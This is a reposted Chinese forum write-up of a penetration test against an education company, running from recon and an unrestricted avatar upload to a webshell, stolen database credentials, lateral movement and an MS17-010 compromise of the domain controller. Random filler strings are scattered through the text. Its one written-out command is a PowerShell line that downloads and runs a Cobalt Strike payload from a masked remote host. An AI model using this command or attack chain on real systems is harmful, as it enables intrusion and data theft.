找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2552|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, m0 {! ]$ h+ ?( T 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路- Z# }) h! F9 p6 T

8 h5 m3 F# e$ S& I; l

; ~5 h) u3 n5 a; N) H   & R e# B2 d8 d( w4 s

) B# g7 m0 O) v

: d1 b3 Q/ `7 ^' a2 o 正文 " O1 O+ ^5 C& w) ?+ B

" L3 \6 _# U: G, N7 l! Y$ h

3 |: q" p" D# L3 o1 o3 U( D' Q  & @8 V; V d; J" j( E* ?( Z

2 z* ^% v" I! j/ ~

, A7 n: Y9 L: @" c4 `/ Z 目标:www.xxxx.com(一家教育机构)
1 q2 p. B; _ Z% `" t5 r( b
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
7 L6 V+ W6 i. j3 u- ^4 }4 n

5 P- j. ~) M! i3 [# M& K

T6 @# C& B. l4 n( q) \ vshapes= $ B) e+ Z; C( f9 ]' A' C

3 T8 J: y! k; u a+ O i- W

% ?# P& b% A( L+ ~; q1 X 进行了简单的信息搜集
* W; j6 K8 D; E, V
+ ~. e$ q; P9 u7 k' o
7 @! I$ T" d2 r

" u0 L# k- y8 u6 N( P+ h3 M

6 H2 X( A3 I& c! d2 K1 ` 子域名搜集0 u7 Q) a B1 @* U

$ U/ ^" L, ?- i$ R0 i: l" k; K7 z

z* L. i8 S I0 h; r( p) v vshapes=( D7 e5 W' {( y, n e$ c z" _& h; v

: `; ~( F; J d5 n6 X

& J; I x: f! ?: x fofa找资产
+ d6 l7 p8 x8 t' [- a0 @8 O
5 ~7 {* _3 H2 ^$ }
2 L" W1 f5 |7 l. e3 r h7 q

^5 `' k& ^* f6 X( ]8 u5 N

8 @- b0 K. x3 \6 U# C$ X& r vshapes=5 a, D1 \: {! l0 Z/ D/ S7 c+ v: g' l

. O. v& p/ l0 m* c

8 R: j& a$ I* b, K$ o& ?) M 一共七个资产。去重之后只有两个。
- @1 u; u! |3 f. y' X, _
: u. l' i- B+ b0 C) m( U/ g
. S) N1 P1 h' \$ ?3 v

+ q2 m& Q% Y* j. {' U# m

8 [* |( t% P3 I, ?3 D 目录探测 ( y) G4 \3 {7 }7 r, D' P

1 F I: W! R# C! Y0 U s* z* g

# Y2 z; g! ?7 q! \( o2 ^* T) q vshapes=7 ^; M/ f3 }. U# y0 [5 j

$ a1 H5 T4 m( {1 W5 Q4 P" f

- \) a/ \3 A, O( \* d g 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
) G2 J: Q3 {3 L
3 ]" a% ?# X3 U' N0 Z
, i( |- H9 h- a5 S: K1 r% | C5 `

: [$ u, w5 Z" ?( j( J

( G* q! T9 m3 B( r& y 我又尝试了通过修改返回包来绕过登录界面 : k: Z9 _. j) Z6 x1 b1 n

0 o) d7 n" K5 N3 ^4 _: e

5 R1 H/ {8 U% {: R8 w vshapes= + L1 K5 S1 o0 Z' `- M R% I. ~

+ W. \! u5 n/ F; P! [# ]5 _

- s' X) I5 w% ^/ k% x$ z7 h! z 还是不行,尝试注入无果 - w8 U, m5 e) W" P, Q! r# D

- E+ p3 y/ u- Z0 J7 Y- u+ c3 X

/ E; ~9 r, ?: V9 x1 K6 ~! T vshapes=: @, I4 s, ?! f- k! O

3 M# [4 Q5 V0 @4 y& i, m

- W2 F$ k/ R/ w, Z7 v4 p 不过我目录探测出了一处Spring信息泄露
- z) j) D5 U' w m3 u# D
5 [) y1 Y6 r+ y" b) h/ D5 v/ h
. v" ]) u! h' R/ y5 a; {! R

6 l5 u# @/ n/ B$ W# s+ A

, v7 F! w+ e2 U, R+ N vshapes= " p$ S' v7 K6 Q- o# { {

, ^. K7 H9 w5 s8 V

3 }. A- b$ Y6 T2 H2 q( F% y 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 E- w% w4 E0 p5 L! r+ f

( z- N6 N4 r* h4 x3 s! T

/ |6 W. | P4 Q5 s( V. V vshapes= ; y" |/ U# I; S# b+ l, Z% E6 @8 h

9 `8 {1 K/ Z) Q

8 m* [' d0 E; N; _' O4 Y; `3 T 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 6 Q& f, R v* a* O* W0 T e

0 z) D: j3 T. b4 g

2 Z0 C6 ]1 I( P vshapes= 6 D- ^: {. r8 }2 B

@+ t( T. x9 E" G @" r% ]) ~

6 c9 l% A3 }( l u 获取有些师傅到这一步就手机抓包电脑测了。 6 j( b u+ ]5 j/ L/ ]

* F _9 l2 T. E- o: z5 e# H q

$ H2 L* [. ?9 I Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。' E7 G) v1 E" s& G' G2 Z; D7 y

0 W# {% J- D; s: x

+ \3 N- c' b$ L+ I$ N6 ?6 m! ^0 d 其中在一个公众号发现了小程序,可以进行注册。 2 l* V$ h8 G' M2 G1 y

4 H! Y8 o F0 W

) D. w; D% ] ^# a9 ~, B' ` 看到了头像上传,尝试上传获取WebShell/ {" p- | @- f$ [$ Z! k

( C0 `) w! [: s$ K

! @4 n# A) y* i q& C9 g! p7 Z; w vshapes=$ t; D1 ?2 J5 P+ T* `/ s

3 A8 c6 R: s) Z& S2 S4 W

6 [: [# [, i* _, K1 f/ T) a 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问7 d" \+ {; n3 I* C- g6 y/ B# Z% @+ P

$ W+ k" e/ v4 Z5 T

7 e+ c0 g7 V8 a1 O3 \ ^+ ~! y) a' M( ] vshapes=+ y/ b" [" p% x

N5 m- n) J( m0 u/ j

% c; r( c% a* P8 D0 v4 {& a' s( M/ _ 然后上了大马 , m, {5 \" k& H$ ?2 {0 k

- b- T# z3 \- @5 {: ^; A

2 j) R& h2 H4 |1 T& }, t vshapes= * m5 V( s4 L% A- i0 d: h }5 n

* ^& e/ K& ]( n& ~% {. G3 m2 e

+ F5 \6 W! u9 c, J vshapes=3 L4 v: t! G9 ]' Q5 o4 w1 M: ?

& b3 M+ r q, f' J0 C

! M, S' x& U. g5 `& F" g2 Z 通过翻找文件发现数据库账号密码3 J6 L6 P5 A, ], U; F

; T, e _( z: W/ ^; o

% G: G* h0 T: F, ^: { vshapes=, N+ r+ H" u! T

' D4 K7 Z- {5 L3 w

- e& A( h! q; A --内网渗透 ) S6 F, ^5 h: M+ R3 h

4 O# ?: _7 K7 X2 { c8 V

' ~# `7 V" i9 Q- o5 H" I 直接通过powershell执行 cs上线 3 s1 ~1 w" i/ {/ j' c

3 w9 p5 c5 \1 C/ E4 P& k/ i

& k2 O( o/ B1 O* [! ^& J( ~7 {3 w6 } powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 6 @4 _7 `- E* @' j/ g3 f+ X

1 d! g5 h& o# Y( C1 d6 g

2 v" d4 a- M* [4 s2 C) a. v# x vshapes=- q9 N+ C5 e5 |

; v) N2 M8 R4 \3 u

8 c& m( q) a0 {: l. m; _, W 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 0 [0 F j) F& R2 n+ x4 z0 W- ]6 ]

$ |. @( q7 m; E

3 i8 x$ e% ]' T: W* I/ g6 z vshapes= 5 \0 c( b, l! L' S6 K; X0 c

! o8 R& M, G& z, q4 Q, v

+ a. b: g1 V+ z1 u6 ] 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
1 r# p; h/ Q$ u6 c/ U8 k9 i! E
K& j3 Y3 H$ Z% m% _/ f
* e5 {9 d) s3 l$ E5 f
3 v* J6 q3 o8 D3 i. \2 |$ L

( W; |. q4 A; O X

* y$ f+ V6 W( G* p) m" J* ` vshapes= ! v4 C9 {$ B! _5 L8 a

& f7 @; E2 N; U& S& }

6 o" S8 r6 F* M4 J* w4 ^' u 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ F9 b) j4 d, m9 a
/ Y/ t5 D( m! ^0 `7 R; G
u0 F- w& o# J& L

% V! e0 `7 C* o* a

, t3 J& o( R9 u5 U* M3 {9 z6 p/ y vshapes= - r3 {' b7 B* X/ i2 a8 c; X

: s$ ]" |) n+ F& E0 d" ~

& j* ?. d0 a4 i) j0 R: G
6 @* K2 g5 [* x. n
4 ?7 c/ ~( k+ c% C
. J! Z2 e, D: W. H9 w4 c y1 J

7 }0 W3 h9 t6 y

D) {1 ~; E; K% g# _2 O" L   0 g P* s0 M9 y4 @3 a8 y1 p9 g3 Z9 I

- B; O1 [1 B0 Z: V* v

9 K! i: @7 ~6 t$ N) ^. J5 | 小结$ t. o9 h. K0 Y4 I+ S8 E

! p0 `4 F3 l5 |) w

/ w- t+ G+ m0 g  ) E6 O; m) r1 c- h! [5 G3 X

! l3 l+ _: r% l# c; \

& _& V0 E+ _1 p6 [; w7 N9 b4 Z1 d 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!6 Y- S5 Q' |0 y+ a Z

$ x; Q0 S9 y& f$ G2 p- Y

- s+ j$ {( `3 v2 _4 H+ @+ b  , [% n' ?, i Y! M. c* m9 Z

6 Z3 M/ u6 j O9 s
    * |. e+ T1 O) L: ^$ l, C
  • - [" b$ ?. D' Q$ X* |  & ?& E: q# b! `$ D3 G4 K
  • & n7 |6 B! k/ |0 x6 }
  • / [8 {% U+ C3 E   * c( E' b( r3 O
  • " @" ~8 c% g: W- }+ o6 G5 f% \
& T9 D$ C1 W! V- M8 z0 y1 Z

2 }: @2 g2 P* b* |( s- d 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html u1 j- H) C9 A2 S2 v4 x

, O( Q$ I! M, {+ r

; g8 ]. {$ H" a8 ?; h  9 U0 l. _4 f" G4 q5 {& `6 I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表